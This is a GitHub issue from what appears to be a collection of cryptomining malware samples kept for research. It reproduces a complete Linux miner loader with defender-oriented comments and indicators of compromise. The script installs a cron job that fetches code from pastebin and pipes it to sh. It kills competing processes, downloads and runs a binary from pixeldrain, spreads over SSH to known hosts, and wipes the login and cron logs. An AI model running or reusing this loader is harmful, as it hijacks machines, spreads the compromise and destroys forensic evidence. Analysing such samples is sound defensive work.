MRdoulestar / whatMiner

整理和收集遇见的各种恶意挖矿样本以供研究和学习(欢迎小伙伴们一起维护)

*/15 * * * * (curl -fsSL https://pastebin.com/raw/TS4NeUnd||wget -q -O- https://pastebin.com/raw/TS4NeUnd)|sh #6

Open sanqingshan opened 5 years ago

sanqingshan commented 5 years ago

# Crontab entry as the reporter pasted it. The markdown renderer consumed the
# leading "*" of the schedule, so "/15 *" is what is left of "*/15 * * * *"
# (every 15 minutes; the issue title shows the intact form). Each firing
# re-downloads the pastebin loader and pipes it unverified into sh. Blocking
# pastebin.com only makes the fetch fail; the entry itself stays in the crontab
# until it is removed explicitly.
/15 * (curl -fsSL https://pastebin.com/raw/TS4NeUnd||wget -q -O- https://pastebin.com/raw/TS4NeUnd)|sh

sanqingshan commented 5 years ago

# Loader body as pasted by the reporter; line breaks were lost in the paste, so
# several of the "lines" that follow are really multiple commands run together.
# Append the standard bin directories so curl/wget/crontab/ps/kill resolve even
# from a minimal environment (presumably the cron environment the loader is
# re-run from).
export PATH=$PATH:/bin:/usr/bin:/sbin:/usr/local/bin:/usr/sbin

# Persistence. `crontab -` reads a complete crontab from stdin and REPLACES the
# caller's current crontab with it: any legitimate entries are wiped and the
# only job left is one that re-fetches the pastebin loader and pipes it to sh.
# "/10 *" is a markdown-rendering artifact; the schedule was presumably
# "*/10 * * * *" (the issue title shows the same loader on a 15-minute
# schedule, so the interval evidently varies between samples).
# Cleanup note: blocking the download domain does not remove this entry. Because
# this line is part of the loader the entry runs, every successful run
# re-installs it, so remove the crontab (crontab -r / edit) only after stopping
# whatever re-runs the loader (the cron entry, and the /tmp/kerberods payload if
# it does so too — not visible from this script).
echo "/10 * (curl -fsSL https://pastebin.com/raw/TS4NeUnd||wget -q -O- https://pastebin.com/raw/TS4NeUnd)|sh" | crontab -

# Intended as two commands, "mkdir -p /tmp" then "chmod 1777 /tmp": make sure a
# world-writable, sticky drop directory exists for the payload fetched below.
# Collapsed onto one line as pasted here it would instead create directories
# named "chmod" and "1777" in the cwd (/tmp already exists, -p keeps it quiet),
# so treat the line as a paste artifact rather than the exact original.
mkdir -p /tmp chmod 1777 /tmp

# Competitor eviction plus dependency install, many original lines collapsed into
# one by the paste: each "ps -ef|grep -v grep|grep <pattern>|awk '{print $2}'|
# xargs kill -9" stood on its own line. Every pattern is a process name or
# argument string belonging to other miners and their pools (hashvault.pro and
# nanopool.org are Monero pools; xmr, ddgs, kworkerds, kthrotlds, kintegrityds,
# kpsmouseds and "systemctI" — capital I, mimicking systemctl — are names other
# families hide behind), and every matching PID is SIGKILLed so this sample has
# the CPU to itself. The list doubles as a hunting list for earlier infections
# on the same host.
# The final ps stage is a catch-all: any process except "khugepageds" whose %CPU
# (field 3 of `ps aux`) is >= 80 is killed. khugepageds is presumably the name
# this sample's own miner runs under, hence the one high-CPU process spared —
# confirm against the binary, this script does not start it by that name.
# Lastly curl and cron are installed via whichever of apt-get/yum/apk succeeds,
# so the download and persistence stages have their tools even on minimal
# images.
ps -ef|grep -v grep|grep hwlh3wlh44lh|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep Circle_MI|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep get.bi-chi.com|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep hashvault.pro|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep nanopool.org|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep /usr/bin/.sshd|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep /usr/bin/bsd-port|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep "xmr"|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep "xig"|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep "ddgs"|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep "qW3xT"|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep "wnTKYg"|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep "t00ls.ru"|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep "sustes"|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep "thisxxs"|awk '{print $2}' | xargs kill -9 ps -ef|grep -v grep|grep "hashfish"|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep "kworkerds"|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep "/tmp/devtool"|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep "systemctI"|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep "kpsmouseds"|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep "kthrotlds"|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep "kintegrityds"|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep "suolbcc"|awk '{print $2}'|xargs kill -9 ps aux|grep -v grep|grep -v khugepageds|awk '{if($3>=80.0) print $2}'|xargs kill -9 apt-get install curl -y||yum install curl -y||apk add curl -y apt-get install cron -y||yum install crontabs -y||apk add cron -y

# Download-and-run stage (whitespace collapsed; "fi /tmp/kerberods elif ..." were
# separate lines). /tmp/.X11unix acts as a liveness marker: if the file is
# absent, or if the PID it contains has no /proc/<pid>/io (i.e. that process is
# gone), the payload is (re)fetched from pixeldrain — file uXvPTUUH for x86_64,
# GqV5aqlq for i686 and for every other arch — written to /tmp/kerberods, made
# executable and run. The two branches are otherwise identical. Nothing here
# writes the marker, so it is presumably created by kerberods itself with its
# own PID; the daemon-like name and the X11-style marker look chosen to blend in
# with system processes. /tmp/.X11unix and /tmp/kerberods are host IoCs. Each
# fetch waits up to 120 s (curl --connect-timeout / wget -T) before failing
# over, so a blocked URL shows up as loader runs that hang for minutes.
if [ ! -f "/tmp/.X11unix" ]; then ARCH=$(uname -m) if [ ${ARCH}x = "x86_64x" ]; then (curl --connect-timeout 120 -fsSL https://pixeldrain.com/api/file/uXvPTUUH -o /tmp/kerberods||wget -T 120 -q https://pixeldrain.com/api/file/uXvPTUUH -O /tmp/kerberods) && chmod +x /tmp/kerberods elif [ ${ARCH}x = "i686x" ]; then (curl --connect-timeout 120 -fsSL https://pixeldrain.com/api/file/GqV5aqlq -o /tmp/kerberods||wget -T 120 -q https://pixeldrain.com/api/file/GqV5aqlq -O /tmp/kerberods) && chmod +x /tmp/kerberods else (curl --connect-timeout 120 -fsSL https://pixeldrain.com/api/file/GqV5aqlq -o /tmp/kerberods||wget -T 120 -q https://pixeldrain.com/api/file/GqV5aqlq -O /tmp/kerberods) && chmod +x /tmp/kerberods fi /tmp/kerberods elif [ ! -f "/proc/$(cat /tmp/.X11unix)/io" ]; then ARCH=$(uname -m) if [ ${ARCH}x = "x86_64x" ]; then (curl --connect-timeout 120 -fsSL https://pixeldrain.com/api/file/uXvPTUUH -o /tmp/kerberods||wget -T 120 -q https://pixeldrain.com/api/file/uXvPTUUH -O /tmp/kerberods) && chmod +x /tmp/kerberods elif [ ${ARCH}x = "i686x" ]; then (curl --connect-timeout 120 -fsSL https://pixeldrain.com/api/file/GqV5aqlq -o /tmp/kerberods||wget -T 120 -q https://pixeldrain.com/api/file/GqV5aqlq -O /tmp/kerberods) && chmod +x /tmp/kerberods else (curl --connect-timeout 120 -fsSL https://pixeldrain.com/api/file/GqV5aqlq -o /tmp/kerberods||wget -T 120 -q https://pixeldrain.com/api/file/GqV5aqlq -O /tmp/kerberods) && chmod +x /tmp/kerberods fi /tmp/kerberods fi

# Lateral movement over SSH. Runs only when root has both a known_hosts and an
# id_rsa.pub. Every dotted-quad-looking token is pulled out of known_hosts (the
# "." in the regex is unescaped, so it matches any character) and, for each,
# the same pastebin loader is launched on that host in the background.
# BatchMode=yes means key-only authentication — the hop succeeds exactly where
# root's existing key is already authorised — StrictHostKeyChecking=no
# suppresses host-key prompts and ConnectTimeout=5 bounds each attempt. Hashed
# known_hosts entries yield no addresses and defeat this stage.
# For IR: every host in the victim's root known_hosts is a candidate secondary
# victim, and those hosts' own auth logs still record the inbound root login
# even though this host's /var/log/secure is emptied further down.
if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then for h in $(grep -oE "\b([0-9]{1,3}.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h '(curl -fsSL https://pastebin.com/raw/TS4NeUnd||wget -q -O- https://pastebin.com/raw/TS4NeUnd)|sh >/dev/null 2>&1 &' & done fi

# Anti-forensics (four separate lines in the original). "0>file" redirects fd 0
# (stdin) to the file, which opens it for writing with O_TRUNC; echo's output
# goes to fd 1, so the only effect is that each file is emptied: root's mailbox
# (where cron delivers job output, including this loader's), wtmp (the login
# history behind `last`), secure (the auth log) and the cron log. The files are
# truncated, not unlinked, so recovery from the filesystem is unlikely — rely on
# remote syslog/journal forwarding or pre-infection snapshots. Sources this line
# leaves alone (btmp, lastlog, auth.log on Debian derivatives, the systemd
# journal, shell history, the neighbours' logs) are still worth collecting.
echo 0>/var/spool/mail/root echo 0>/var/log/wtmp echo 0>/var/log/secure echo 0>/var/log/cron # #

sanqingshan commented 5 years ago

下载的是一个二进制文件，现在把域名屏蔽了，定时任务还清理不掉 (The download is a binary. I have blocked the domain now, but the cron job still cannot be cleaned out.)